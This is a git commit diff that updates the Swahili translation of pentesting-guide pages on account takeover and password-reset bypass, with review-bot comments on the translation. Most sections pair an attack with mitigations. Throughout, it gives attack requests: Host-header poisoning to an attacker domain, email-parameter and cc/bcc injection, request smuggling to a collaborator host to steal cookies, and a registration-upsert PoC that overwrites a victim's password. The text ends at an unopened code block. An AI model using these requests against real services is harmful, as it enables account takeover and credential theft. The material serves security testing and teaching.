Translated ['', 'src/pentesting-web/reset-password.md', 'src/pentesting-

This commit is contained in:
Translator 2025-09-30 09:27:08 +00:00
parent 32cb229fe6
commit 47c59db8e5
2 changed files with 178 additions and 142 deletions

View File

@ -1,41 +1,43 @@
# Usajili & Ukatili wa Akaunti
# Udhaifu wa Usajili na Kunyang'anywa kwa Akaunti
{{#include ../banners/hacktricks-training.md}}
## Ukatili wa Usajili
## Kunyang'anywa kwa Usajili
### Usajili wa Nakala
### Usajili Rudufu
- Jaribu kuunda kwa kutumia jina la mtumiaji lililopo
- Jaribu kutengeneza kwa kutumia username iliyopo
- Angalia kubadilisha barua pepe:
- herufi kubwa
- \+1@
- ongeza nukta kwenye barua pepe
- wahusika maalum katika jina la barua pepe (%00, %09, %20)
- Weka wahusika weusi baada ya barua pepe: `test@test.com a`
- ongeza nukta katika barua pepe
- herufi maalum katika sehemu ya jina la barua pepe (%00, %09, %20)
- Weka whitespace baada ya barua pepe: `test@test.com a`
- victim@gmail.com@attacker.com
- victim@attacker.com@gmail.com
### Uainishaji wa Jina la Mtumiaji
### Utambuzi wa Majina ya Mtumiaji
Angalia kama unaweza kubaini wakati jina la mtumiaji tayari limesajiliwa ndani ya programu.
Angalia kama unaweza kubaini wakati jina la mtumiaji tayari limejisajili ndani ya programu.
### Sera ya Nywila
Unapounda mtumiaji angalia sera ya nywila (angalia kama unaweza kutumia nywila dhaifu).\
Katika hali hiyo unaweza kujaribu kubruteforce akidi.
Unapotengeneza mtumiaji angalia sera ya nywila (angalia kama unaweza kutumia nywila dhaifu).\
Katika hali hiyo unaweza kujaribu bruteforce credentials.
### SQL Injection
[**Angalia ukurasa huu** ](sql-injection/index.html#insert-statement)kujifunza jinsi ya kujaribu ukatili wa akaunti au kutoa taarifa kupitia **SQL Injections** katika fomu za usajili.
[**Angalia ukurasa huu** ](sql-injection/index.html#insert-statement)kujifunza jinsi ya kujaribu kunyang'anya akaunti au kutoa taarifa kupitia **SQL Injections** katika fomu za usajili.
### Oauth Takeovers
### Oauth Ukatili
{{#ref}}
oauth-to-account-takeover.md
{{#endref}}
### SAML Uhalifu
### SAML Vulnerabilities
{{#ref}}
saml-attacks/
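Review bot: the new headings in this hunk render "takeover" with two different words: the title and section heading use "Kunyang'anywa" (`# Udhaifu wa Usajili na Kunyang'anywa kwa Akaunti`, `## Kunyang'anywa kwa Usajili`) while the OAuth heading becomes `### Oauth Ukatili`, and the SAML heading goes the opposite way, from Swahili `### SAML Uhalifu` to untranslated `### SAML Vulnerabilities`. Pick one term for takeover and either translate both the OAuth and SAML headings or leave both in English so the sidebar shows one vocabulary. The duplicate-registration bullets have the same problem in miniature: `- Jaribu kutengeneza kwa kutumia username iliyopo` keeps "username" while the heading `### Utambuzi wa Majina ya Mtumiaji` translates it; use the same word in both.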
@ -43,35 +45,35 @@ saml-attacks/
### Badilisha Barua Pepe
Wakati umesajiliwa jaribu kubadilisha barua pepe na uone kama mabadiliko haya yanathibitishwa kwa usahihi au unaweza kuyabadilisha kuwa barua pepe zisizo za kawaida.
Ukishasajiliwa jaribu kubadilisha barua pepe na angalia kama mabadiliko haya yameidhinishwa ipasavyo au kama yanaweza kubadilishwa hadi anwani yoyote ile.
### Ukaguzi Zaidi
### Mambo ya Ziada ya Kuchunguza
- Angalia kama unaweza kutumia **barua pepe za muda**
- **Nywila** **Ndefu** (>200) inasababisha **DoS**
- **Angalia mipaka ya viwango kwenye uundaji wa akaunti**
- Tumia username@**burp_collab**.net na uchambue **callback**
- Angalia kama unaweza kutumia **disposable emails**
- **Long** **password** (>200) hupelekea **DoS**
- **Angalia rate limits kwenye uundaji wa akaunti**
- Tumia username@**burp_collab**.net na uchambue the **callback**
## **Ukatili wa Kurejesha Nywila**
## **Kunyang'anywa kwa Reset ya Nywila**
### Kuvuja kwa Tokeni ya Kurejesha Nywila Kupitia Referrer <a href="#password-reset-token-leak-via-referrer" id="password-reset-token-leak-via-referrer"></a>
### Password Reset Token Leak Via Referrer <a href="#password-reset-token-leak-via-referrer" id="password-reset-token-leak-via-referrer"></a>
1. Omba kurejesha nywila kwa anwani yako ya barua pepe
2. Bonyeza kwenye kiungo cha kurejesha nywila
1. Omba password reset kwa anwani yako ya barua pepe
2. Bonyeza link ya password reset
3. Usibadilishe nywila
4. Bonyeza tovuti zozote za 3rd party (mfano: Facebook, twitter)
5. Kamatia ombi katika Burp Suite proxy
6. Angalia kama kichwa cha referer kinavuja tokeni ya kurejesha nywila.
4. Bonyeza tovuti yoyote ya 3rd party (mf: Facebook, twitter)
5. Intercept ombi katika Burp Suite proxy
6. Angalia ikiwa referer header is leaking password reset token.
### Ukatili wa Kurejesha Nywila kwa Msumeno <a href="#account-takeover-through-password-reset-poisoning" id="account-takeover-through-password-reset-poisoning"></a>
### Password Reset Poisoning <a href="#account-takeover-through-password-reset-poisoning" id="account-takeover-through-password-reset-poisoning"></a>
1. Kamatia ombi la kurejesha nywila katika Burp Suite
2. Ongeza au hariri vichwa vifuatavyo katika Burp Suite: `Host: attacker.com`, `X-Forwarded-Host: attacker.com`
3. Peleka ombi na kichwa kilichobadilishwa\
1. Intercept ombi la password reset katika Burp Suite
2. Ongeza au hariri headers zifuatazo katika Burp Suite : `Host: attacker.com`, `X-Forwarded-Host: attacker.com`
3. Forward ombi na header iliyohaririwa\
`http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com`
4. Tafuta URL ya kurejesha nywila kulingana na _kichwa cha host_ kama: `https://attacker.com/reset-password.php?token=TOKEN`
4. Tafuta URL ya password reset kulingana na _host header_ kama : `https://attacker.com/reset-password.php?token=TOKEN`
### Kurejesha Nywila Kupitia Parameta ya Barua Pepe <a href="#password-reset-via-email-parameter" id="password-reset-via-email-parameter"></a>
### Password Reset Via Email Parameter <a href="#password-reset-via-email-parameter" id="password-reset-via-email-parameter"></a>
```bash
# parameter pollution
email=victim@mail.com&email=hacker@mail.com
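Review bot: step 6 of the referrer-leak procedure is only half translated, `6. Angalia ikiwa referer header is leaking password reset token.` switches to English mid-sentence, whereas the line it replaces (`6. Angalia kama kichwa cha referer kinavuja tokeni ya kurejesha nywila.`) was complete; finish the sentence in Swahili or keep the earlier wording. Separately, the sample request under step 3 of the poisoning procedure is squeezed into a single inline code span with a stray `http` language tag at the front ('http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com'), which is a collapsed fenced block; restore it as a multi-line ```http fence so the manipulated Host header is visible as its own line, since that header is the whole point of the step.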
@ -90,56 +92,56 @@ email=victim@mail.com|hacker@mail.com
```
### IDOR on API Parameters <a href="#idor-on-api-parameters" id="idor-on-api-parameters"></a>
1. Mshambuliaji lazima aingie kwenye akaunti yao na aende kwenye kipengele cha **Badilisha nenosiri**.
2. Anza Burp Suite na uingilie ombi
3. Tuma kwenye tab ya repeater na uhariri vigezo: User ID/email\
1. Mshambuliaji lazima aingie kwa akaunti yao na aende kwenye kipengele cha **Change password**.
2. Anzisha Burp Suite na intercept ombi
3. Tuma kwenye tab ya Repeater na badilisha vigezo: User ID/email\
`powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})`
### Weak Password Reset Token <a href="#weak-password-reset-token" id="weak-password-reset-token"></a>
Token ya kubadilisha nenosiri inapaswa kuundwa kwa bahati nasibu na kuwa ya kipekee kila wakati.\
Jaribu kubaini kama token inakoma au ikiwa kila wakati ni ile ile, katika baadhi ya matukio algorithimu ya uzalishaji ni dhaifu na inaweza kukisiwa. Vigezo vifuatavyo vinaweza kutumika na algorithimu.
Token ya reset ya password inapaswa kuundwa kwa nasibu na kuwa ya kipekee kila mara.\
Jaribu kubaini kama token inaisha (expire) au ikiwa daima ni ile ile; katika baadhi ya kesi algorithm ya uundaji ni dhaifu na inaweza kukisiwa. Vigezo vifuatavyo vinaweza kutumika na algorithm:
- Timestamp
- UserID
- Barua pepe ya Mtumiaji
- Jina la Kwanza na Jina la Mwisho
- Tarehe ya Kuzaliwa
- Barua pepe ya mtumiaji
- Jina na jina la mwisho
- Tarehe ya kuzaliwa
- Cryptography
- Nambari pekee
- Mfuatano mdogo wa token (herufi kati ya \[A-Z,a-z,0-9])
- Tumia tena token
- Small token sequence ( characters between \[A-Z,a-z,0-9])
- Token reuse
- Tarehe ya kumalizika kwa token
### Leaking Password Reset Token <a href="#leaking-password-reset-token" id="leaking-password-reset-token"></a>
1. Trigger ombi la kubadilisha nenosiri kwa kutumia API/UI kwa barua pepe maalum e.g: test@mail.com
2. Kagua jibu la seva na angalia `resetToken`
3. Kisha tumia token hiyo katika URL kama `https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]`
1. Chochea ombi la reset la password kwa kutumia API/UI kwa barua pepe maalum, kwa mfano: test@mail.com
2. Chunguza majibu ya server na angalia `resetToken`
3. Kisha tumia token kwenye URL kama `https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]`
### Password Reset Via Username Collision <a href="#password-reset-via-username-collision" id="password-reset-via-username-collision"></a>
1. Jisajili kwenye mfumo kwa jina la mtumiaji linalofanana na jina la mtumiaji wa mwathirika, lakini ukiweka nafasi za wazi kabla na/au baada ya jina la mtumiaji. e.g: `"admin "`
2. Omba kubadilisha nenosiri kwa kutumia jina lako la mtumiaji la uhalifu.
3. Tumia token iliyotumwa kwa barua pepe yako na ubadilishe nenosiri la mwathirika.
4. Unganisha kwenye akaunti ya mwathirika kwa nenosiri jipya.
1. Jisajili kwenye mfumo kwa username sawa na ya mwathiriwa, lakini ukiweke nafasi tupu kabla na/au baada ya username. e.g: `"admin "`
2. Omba reset ya password kwa kutumia username yako ya uharibifu.
3. Tumia token iliyotumwa kwa barua pepe yako na fanya reset ya password ya mwathiriwa.
4. Ingia kwenye akaunti ya mwathiriwa kwa kutumia password mpya.
Jukwaa la CTFd lilikuwa na udhaifu kwa shambulio hili.\
Tazama: [CVE-2020-7245](https://nvd.nist.gov/vuln/detail/CVE-2020-7245)
Jukwaa CTFd lilikuwa dhaifu dhidi ya shambulio hili.\
See: [CVE-2020-7245](https://nvd.nist.gov/vuln/detail/CVE-2020-7245)
### Account Takeover Via Cross Site Scripting <a href="#account-takeover-via-cross-site-scripting" id="account-takeover-via-cross-site-scripting"></a>
1. Pata XSS ndani ya programu au subdomain ikiwa vidakuzi vimewekwa kwenye kikoa cha domain ya mzazi: `*.domain.com`
2. Leak **vidakuzi vya sasa vya sessions**
1. Tafuta XSS ndani ya application au subdomain ikiwa cookies zimepangwa kwa parent domain : `*.domain.com`
2. Leak **sessions cookie** ya sasa
3. Thibitisha kama mtumiaji kwa kutumia cookie
### Account Takeover Via HTTP Request Smuggling <a href="#account-takeover-via-http-request-smuggling" id="account-takeover-via-http-request-smuggling"></a>
1\. Tumia **smuggler** kugundua aina ya HTTP Request Smuggling (CL, TE, CL.TE)\
1\. Tumia **smuggler** kutambua aina ya HTTP Request Smuggling (CL, TE, CL.TE)\
`powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h`\
2\. Tengeneza ombi ambalo litabadilisha `POST / HTTP/1.1` na data ifuatayo:\
`GET http://something.burpcollaborator.net HTTP/1.1 X:` kwa lengo la kufungua redirect wa wahanga kwenda burpcollab na kuiba vidakuzi vyao\
3\. Ombi la mwisho linaweza kuonekana kama ifuatavyo
2\. Tengeneza request itakayofuta `POST / HTTP/1.1` na data ifuatayo:\
`GET http://something.burpcollaborator.net HTTP/1.1 X:` kwa lengo la ku-open redirect wa waathiriwa kwenda burpcollab na kuiba cookies zao\
3\. Ombi la mwisho linaweza kuonekana kama lifuatayo
```
GET / HTTP/1.1
Transfer-Encoding: chunked
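Review bot: two code samples in this hunk carry a leaked fence language as inline text, 'powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})' under the IDOR steps and 'powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h' under the smuggling steps; both were fenced blocks that got flattened into one backtick span, so three shell commands now read as one line and an HTTP request is labelled PowerShell. Restore the fences (```http for the request, ```bash for the clone/cd/run sequence). Two translation regressions as well: `Tazama: [CVE-2020-7245]` is replaced by `See: [CVE-2020-7245]`, moving a translated word back to English, and `e.g:` in the username-collision step stays untranslated in both the old and the new line.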
@ -151,20 +153,20 @@ Content-Length: 83
GET http://something.burpcollaborator.net HTTP/1.1
X: X
```
Hackerone inaripoti kutumia hitilafu hii\
Hackerone ripoti kuhusu kutumiwa kwa bug hii\
\* [https://hackerone.com/reports/737140](https://hackerone.com/reports/737140)\
\* [https://hackerone.com/reports/771666](https://hackerone.com/reports/771666)
### Kuchukua Akaunti kupitia CSRF <a href="#account-takeover-via-csrf" id="account-takeover-via-csrf"></a>
### Account Takeover via CSRF <a href="#account-takeover-via-csrf" id="account-takeover-via-csrf"></a>
1. Tengeneza payload kwa CSRF, e.g: “Fomu ya HTML yenye kuwasilisha kiotomatiki kwa ajili ya kubadilisha nenosiri
1. Tengeneza payload kwa CSRF, mfano: “HTML form with auto submit for a password change
2. Tuma payload
### Kuchukua Akaunti kupitia JWT <a href="#account-takeover-via-jwt" id="account-takeover-via-jwt"></a>
### Account Takeover via JWT <a href="#account-takeover-via-jwt" id="account-takeover-via-jwt"></a>
JSON Web Token inaweza kutumika kuthibitisha mtumiaji.
- Hariri JWT kwa ID ya Mtumiaji / Barua pepe nyingine
- Hariri JWT kwa User ID / Email mwingine
- Angalia saini dhaifu ya JWT
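Review bot: the CSRF payload description has an unclosed quotation mark in both the old and the new line (`1. Tengeneza payload kwa CSRF, mfano: “HTML form with auto submit for a password change`); either close it after "change" or drop the opening quote. The new line also leaves the quoted phrase in English where the line it replaces (`“Fomu ya HTML yenye kuwasilisha kiotomatiki kwa ajili ya kubadilisha nenosiri`) had translated it, which is a step backwards for a translation commit.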
@ -172,8 +174,29 @@ JSON Web Token inaweza kutumika kuthibitisha mtumiaji.
hacking-jwt-json-web-tokens.md
{{#endref}}
## Marejeleo
## Registration-as-Reset (Upsert on Existing Email)
Baadhi ya signup handlers hufanya upsert wakati email iliyotolewa tayari ipo. Ikiwa endpoint inakubali minimal body yenye email na password na haitekelezi uthibitisho wa umiliki, kutuma email ya mwathiri kutabadilisha password yao kabla ya uthibitisho.
- Discovery: vunja majina ya endpoints kutoka bundled JS (au trafiki ya mobile app), kisha fuzza base paths kama /parents/application/v4/admin/FUZZ ukitumia ffuf/dirsearch.
- Method hints: GET inayorejesha ujumbe kama "Only POST request is allowed." mara nyingi inaonyesha kitenzi sahihi na kwamba JSON body inatarajiwa.
- Minimal body observed in the wild:
```json
{"email":"victim@example.com","password":"New@12345"}
```
Mfano wa PoC:
```http
POST /parents/application/v4/admin/doRegistrationEntries HTTP/1.1
Host: www.target.tld
Content-Type: application/json
{"email":"victim@example.com","password":"New@12345"}
```
Athari: Full Account Takeover (ATO) bila reset token, OTP, au email verification.
## Marejeo
- [How I Found a Critical Password Reset Bug (Registration upsert ATO)](https://s41n1k.medium.com/how-i-found-a-critical-password-reset-bug-in-the-bb-program-and-got-4-000-a22fffe285e1)
- [https://salmonsec.com/cheatsheet/account_takeover](https://salmonsec.com/cheatsheet/account_takeover)
{{#include ../banners/hacktricks-training.md}}
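Review bot: the new Registration-as-Reset section mixes languages inside its own bullet list: `- Discovery: ...` and `- Method hints: ...` open with English labels and `- Minimal body observed in the wild:` is entirely English, while the surrounding sentences are Swahili; translate the labels and that bullet. The section also states impact (`Athari: Full Account Takeover (ATO) bila reset token, OTP, au email verification.`) without any mitigation, unlike the rest of the page; add the counterpart of what the first sentence already implies, that a signup handler must never update an existing account's credentials and must require ownership verification before touching a password. Note that the same section with the same PoC is also added to reset-password.md in this commit, so any wording fix has to be applied in both files.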

View File

@ -1,12 +1,12 @@
# Reset/Forgotten Password Bypass
# Weka upya/Nenosiri Lililosahaulika Bypass
{{#include ../banners/hacktricks-training.md}}
## **Password Reset Token Leak Via Referrer**
## **Token ya Reset ya Nenosiri Leak Via Referrer**
- The HTTP referer header may leak the password reset token if it's included in the URL. This can occur when a user clicks on a third-party website link after requesting a password reset.
- **Athari**: Inawezekana takeover ya akaunti kupitia Cross-Site Request Forgery (CSRF) attacks.
- **Utekelezaji**: Ili kuhakikisha kama password reset token ina leak kwenye referer header, **omba password reset** kwa anwani yako ya barua pepe na **bonyeza reset link** uliopokea. **Usibadilishe nenosiri lako** mara moja. Badala yake, **nenda kwenye tovuti ya mtu wa tatu** (kama Facebook au Twitter) huku **ukikamata maombi ukitumia Burp Suite**. Kagua maombi kuona kama **referer header ina password reset token**, kwani hili linaweza kufichua taarifa nyeti kwa wadau wa tatu.
- **Athari**: Uwezekano wa uchukuzi wa akaunti kupitia Cross-Site Request Forgery (CSRF) attacks.
- **Utekelezaji**: Ili kukagua kama token ya reset ya nenosiri ina leak katika referer header, **omba reset ya nenosiri** kwa anwani yako ya barua pepe na **bonyeza link ya reset** iliyotolewa. **Usibadilishe nenosiri lako** mara moja. Badala yake, **tembea kwenda tovuti ya mtu wa tatu** (kama Facebook au Twitter) wakati **ukikamata maombi ukitumia Burp Suite**. Chunguza maombi kuona kama **referer header ina token ya reset ya nenosiri**, kwani hii inaweza kufichua taarifa nyeti kwa wahusika wa tatu.
- **Marejeo**:
- [HackerOne Report 342693](https://hackerone.com/reports/342693)
- [HackerOne Report 272379](https://hackerone.com/reports/272379)
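Review bot: the first bullet of the Referrer section is an unchanged context line still in English (`- The HTTP referer header may leak the password reset token if it's included in the URL. ...`) while the bullets after it (`- **Athari**: ...`, `- **Utekelezaji**: ...`) are Swahili; since this commit retranslates the file, that line should be translated as well. The page title `# Weka upya/Nenosiri Lililosahaulika Bypass` also mixes Swahili with the English "Bypass" in one heading; either translate that word or keep the whole title in English, as is done for `## **Password Reset Poisoning**` further down.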
@ -14,165 +14,165 @@
## **Password Reset Poisoning**
- Washambuliaji wanaweza kubadilisha Host header wakati wa maombi ya password reset ili kuelekeza reset link kwenye tovuti hatari.
- **Athari**: Inaweza kusababisha takeover ya akaunti kwa leaking reset tokens kwa washambuliaji.
- **Hatua za Uzuiaji**:
- Thibitisha Host header dhidi ya whitelist ya domain zilizoruhusiwa.
- Tumia mbinu salama za server-side kutengeneza absolute URLs.
- **Patch**: Tumia `$_SERVER['SERVER_NAME']` kujenga password reset URLs badala ya `$_SERVER['HTTP_HOST']`.
- Wavamizi wanaweza kudanganya Host header wakati wa maombi ya password reset ili kuelekeza link ya reset kwenye tovuti yenye hatari.
- **Athari**: Inaweza kusababisha uchukuzi wa akaunti kwa leaking reset tokens kwa wavamizi.
- **Hatua za Kukabiliana**:
- Thibitisha Host header dhidi ya orodha nyeupe ya domains zinazoruhusiwa.
- Tumia mbinu salama za upande wa server (server-side) kutengeneza absolute URLs.
- **Patch**: Use `$_SERVER['SERVER_NAME']` to construct password reset URLs instead of `$_SERVER['HTTP_HOST']`.
- **Marejeo**:
- [Acunetix Article on Password Reset Poisoning](https://www.acunetix.com/blog/articles/password-reset-poisoning/)
## **Password Reset By Manipulating Email Parameter**
Attackers can manipulate the password reset request by adding additional email parameters to divert the reset link.
Wavamizi wanaweza kudanganya ombi la password reset kwa kuongeza parameter za email za ziada ili kuelekeza link ya reset.
- Add attacker email as second parameter using &
- Ongeza barua pepe ya mavamizi kama parameter ya pili ukitumia &
```php
POST /resetPassword
[...]
email=victim@email.com&email=attacker@email.com
```
- Ongeza barua pepe ya mshambuliaji kama kiparameta cha pili ukitumia %20
- Ongeza anwani ya barua pepe ya mshambuliaji kama parametri ya pili kwa kutumia %20
```php
POST /resetPassword
[...]
email=victim@email.com%20email=attacker@email.com
```
- Ongeza attacker email kama parameter ya pili ukitumia |
- Ongeza attacker email kama kigezo cha pili ukitumia |
```php
POST /resetPassword
[...]
email=victim@email.com|email=attacker@email.com
```
- Ongeza attacker email kama kigezo cha pili ukitumia cc
- Ongeza barua pepe ya mshambuliaji kama parameter ya pili ukitumia cc
```php
POST /resetPassword
[...]
email="victim@mail.tld%0a%0dcc:attacker@mail.tld"
```
- Ongeza barua pepe ya attacker kama parameta ya pili ukitumia bcc
- Ongeza anwani ya barua pepe ya mshambuliaji kama parameter ya pili kwa kutumia bcc
```php
POST /resetPassword
[...]
email="victim@mail.tld%0a%0dbcc:attacker@mail.tld"
```
Ongeza attacker email kama kigezo cha pili ukitumia ,
- Ongeza barua pepe ya mshambuliaji kama kigezo cha pili ukitumia ,
```php
POST /resetPassword
[...]
email="victim@mail.tld",email="attacker@mail.tld"
```
- Ongeza attacker email kama parameta ya pili katika json array
- Ongeza attacker email kama parameter wa pili katika json array
```php
POST /resetPassword
[...]
{"email":["victim@mail.tld","atracker@mail.tld"]}
```
- **Hatua za Kupunguza Hatari**:
- Chambua na thibitisha vigezo vya barua pepe upande wa serveri ipasavyo.
- Changanua na thibitisha ipasavyo email parameters server-side.
- Tumia prepared statements au parameterized queries ili kuzuia injection attacks.
- **Marejeo**:
- [https://medium.com/@0xankush/readme-com-account-takeover-bugbounty-fulldisclosure-a36ddbe915be](https://medium.com/@0xankush/readme-com-account-takeover-bugbounty-fulldisclosure-a36ddbe915be)
- [https://ninadmathpati.com/2019/08/17/how-i-was-able-to-earn-1000-with-just-10-minutes-of-bug-bounty/](https://ninadmathpati.com/2019/08/17/how-i-was-able-to-earn-1000-with-just-10-minutes-of-bug-bounty/)
- [https://twitter.com/HusseiN98D/status/1254888748216655872](https://twitter.com/HusseiN98D/status/1254888748216655872)
## **Kubadilisha barua pepe na nenosiri ya mtumiaji yeyote kupitia vigezo vya API**
## **Kubadilisha Email na Password ya Mtumiaji yeyote kupitia API Parameters**
- Wavamizi wanaweza kubadilisha vigezo vya barua pepe na nenosiri katika maombi ya API ili kubadilisha nyaraka za kuingia za akaunti.
- Attackers wanaweza kubadilisha email na password parameters katika API requests ili kubadilisha account credentials.
```php
POST /api/changepass
[...]
("form": {"email":"victim@email.tld","password":"12345678"})
```
- **Hatua za Kupunguza Hatari**:
- Hakikisha ukaguzi mkali wa vigezo na ukaguzi wa uthibitisho.
- Tekeleza logging na ufuatiliaji imara ili kugundua na kujibu shughuli zenye mashaka.
- **Marejeo**:
- **Hatua za Kukabiliana**:
- Hakikisha validation kali ya parameters na authentication checks.
- Tekeleza logging na monitoring thabiti ili kugundua na kujibu shughuli zenye shaka.
- **Rejea**:
- [Full Account Takeover via API Parameter Manipulation](https://medium.com/@adeshkolte/full-account-takeover-changing-email-and-password-of-any-user-through-api-parameters-3d527ab27240)
## **Hakuna Rate Limiting: Email Bombing**
- Ukosefu wa rate limiting kwenye maombi ya password reset kunaweza kusababisha Email Bombing, kumwaga mtumiaji kwa barua pepe nyingi za reset.
- **Hatua za Kupunguza Hatari**:
- Tekeleza rate limiting kulingana na IP address au akaunti ya mtumiaji.
- Tumia CAPTCHA challenges ili kuzuia matumizi ya kiotomatiki.
- Ukosefu wa rate limiting kwenye maombi ya password reset unaweza kusababisha email bombing, kuwazidi mtumiaji kwa barua nyingi za reset.
- **Hatua za Kukabiliana**:
- Tekeleza rate limiting kwa msingi wa IP address au akaunti ya mtumiaji.
- Tumia CAPTCHA ili kuzuia automated abuse.
- **Marejeo**:
- [HackerOne Report 280534](https://hackerone.com/reports/280534)
## **Gundua Jinsi Password Reset Token Inavyotengenezwa**
## **Gundua Jinsi Token ya Password Reset Inavyotengenezwa**
- Kuelewa muundo au mbinu nyuma ya token generation kunaweza kusababisha utabiri au brute-forcing ya token. Baadhi ya chaguo:
- Based Timestamp
- Based on the UserID
- Based on email of User
- Based on Firstname and Lastname
- Based on Date of Birth
- Based on Cryptography
- **Hatua za Kupunguza Hatari**:
- Tumia mbinu za cryptographic zenye nguvu kwa token generation.
- Hakikisha upatikanaji wa randomness na urefu wa kutosha ili kuzuia utabiri.
- **Tools**: Tumia Burp Sequencer kuchambua randomness ya tokens.
- Kuelewa muundo au mbinu ya kuunda token kunaweza kusababisha kutabiri au brute-forcing token. Baadhi ya chaguzi:
- Kulingana na Timestamp
- Kulingana na UserID
- Kulingana na email ya User
- Kulingana na Firstname na Lastname
- Kulingana na Date of Birth
- Kulingana na Cryptography
- **Hatua za Kukabiliana**:
- Tumia mbinu imara za cryptographic kwa ajili ya token generation.
- Hakikisha randomness na urefu wa kutosha ili kuzuia utabiri.
- **Zana**: Tumia Burp Sequencer kuchambua randomness ya tokens.
## **Guessable UUID**
- Kama UUIDs (version 1) zinaweza kutabiriwa, wadukuzi wanaweza kuzifanyia brute-force ili kuzalisha reset tokens halali. Angalia:
- Ikiwa UUIDs (version 1) zinaweza kutabirika au kutabiriwa, washambuliaji wanaweza kuzi brute-force ili kutengeneza reset tokens halali. Angalia:
{{#ref}}
uuid-insecurities.md
{{#endref}}
- **Hatua za Kupunguza Hatari**:
- **Hatua za Kukabiliana**:
- Tumia GUID version 4 kwa randomness au tekeleza hatua za ziada za usalama kwa versions nyingine.
- **Tools**: Tumia [guidtool](https://github.com/intruder-io/guidtool) kwa kuchambua na kuzalisha GUIDs.
- **Zana**: Tumia [guidtool](https://github.com/intruder-io/guidtool) kwa kuchambua na kutengeneza GUIDs.
## **Response Manipulation: Replace Bad Response With Good One**
- Kukandamiza HTTP responses ili kupita ujumbe wa makosa au vizuizi.
- **Hatua za Kupunguza Hatari**:
- Tekeleza ukaguzi upande wa server ili kuhakikisha uadilifu wa response.
- Tumia njia salama za mawasiliano kama HTTPS ili kuzuia man-in-the-middle attacks.
- **Marejeo**:
- Kukandamiza HTTP responses ili kupitisha error messages au vizuizi.
- **Hatua za Kukabiliana**:
- Tekeleza server-side checks ili kuhakikisha integrity ya response.
- Tumia njia salama za mawasiliano kama HTTPS kuzuia man-in-the-middle attacks.
- **Rejea**:
- [Critical Bug in Live Bug Bounty Event](https://medium.com/@innocenthacker/how-i-found-the-most-critical-bug-in-live-bug-bounty-event-7a88b3aa97b3)
## **Using Expired Token**
## **Kutumia Token Iliyopitwa na Wakati**
- Kujaribu kama expired tokens bado zinaweza kutumika kwa password reset.
- **Hatua za Kupunguza Hatari**:
- Tekeleza sera kali za kuisha kwa token na thibitisha muda wa kuisha upande wa server.
- Kupima kama token zilizopitwa na wakati bado zinaweza kutumika kwa password reset.
- **Hatua za Kukabiliana**:
- Tekeleza sera kali za kuisha kwa token na thibitisha expiration ya token server-side.
## **Brute Force Password Reset Token**
- Kujaribu brute-force reset token kwa kutumia zana kama Burpsuite na IP-Rotator ili kupita rate limits za IP.
- **Hatua za Kupunguza Hatari**:
- Tekeleza rate-limiting imara na mifumo ya kufunga akaunti.
- Fuatilia shughuli zenye mashaka zinazoashiria mashambulizi ya brute-force.
- Kujaribu brute-force reset token kwa kutumia zana kama Burpsuite na IP-Rotator kupitisha rate limits za IP.
- **Hatua za Kukabiliana**:
- Tekeleza rate-limiting thabiti na mechanisms za kufunga akaunti.
- Fuatilia shughuli zenye shaka zinazoonyesha brute-force attacks.
## **Try Using Your Token**
## **Jaribu Kutumia Token Yako**
- Kujaribu kama reset token ya mshambuliaji inaweza kutumika pamoja na email ya mwathiriwa.
- **Hatua za Kupunguza Hatari**:
- Hakikisha token zimefungwa na session ya mtumiaji au sifa nyingine zinazohusiana na mtumiaji.
- Kupima kama reset token ya mshambuliaji inaweza kutumika kwa pamoja na email ya mwathiriwa.
- **Hatua za Kukabiliana**:
- Hakikisha token zimefungwa kwenye session ya mtumiaji au sifa nyingine za mtumiaji.
## **Session Invalidation in Logout/Password Reset**
## **Kufuta Session wakati wa Logout/Password Reset**
- Kuhakikisha session zinavunjwa wakati mtumiaji anatoa logout au anarekebisha password yake.
- **Hatua za Kupunguza Hatari**:
- Tekeleza usimamizi sahihi wa session, kuhakikisha kwamba session zote zinavunjwa baada ya logout au password reset.
- Kuhakikisha sessions zinafutwa wakati mtumiaji anatoa logout au anafanya password reset.
- **Hatua za Kukabiliana**:
- Tekeleza usimamizi sahihi wa session, kuhakikisha sessions zote zinafutwa wakati wa logout au password reset.
## **Session Invalidation in Logout/Password Reset**
## **Kufuta Session wakati wa Logout/Password Reset**
- Reset tokens zinapaswa kuwa na muda wa kumalizika baada yake zinakuwa batili.
- **Hatua za Kupunguza Hatari**:
- Weka muda wa kumalizika unaofaa kwa reset tokens na utekeleze kwa ukali upande wa server.
- Reset tokens zinapaswa kuwa na muda wa kumalizika baada yake zitakuwa batili.
- **Hatua za Kukabiliana**:
- Weka muda wa kuisha unaofaa kwa reset tokens na udumishe kikamilifu server-side.
## **OTP rate limit bypass by changing your session**
- Ikiwa tovuti inatumia session ya mtumiaji kufuatilia jaribio mbaya za OTP na OTP ilikuwa dhaifu (<= 4 digits) basi tunaweza kufanya brute-force ya OTP kwa ufanisi.
- Ikiwa tovuti inatumia session ya mtumiaji kufuatilia jaribio mbaya za OTP na OTP ni dhaifu (<= 4 digits) basi tunaweza kwa ufanisi ku-bruteforce OTP.
- **Utekelezaji**:
- Omba tu session token mpya baada ya kuzuia na server.
- **Mfano** code inayo-exploit mdudu huu kwa kukisia OTP kwa nasibu (wakati unabadilisha session OTP itabadilika pia, hivyo hatutaweza kuifanya brute-force kwa mfululizo!):
- Tafuta tu session token mpya baada ya kukataliwa na server.
- **Mfano** code inayotumia mdudu huu kwa kubahatisha kukisia OTP (wakati unabadilisha session OTP itabadilika pia, hivyo hatutaweza kuifanya bruteforce kwa mpangilio!):
``` python
# Authentication bypass by password reset
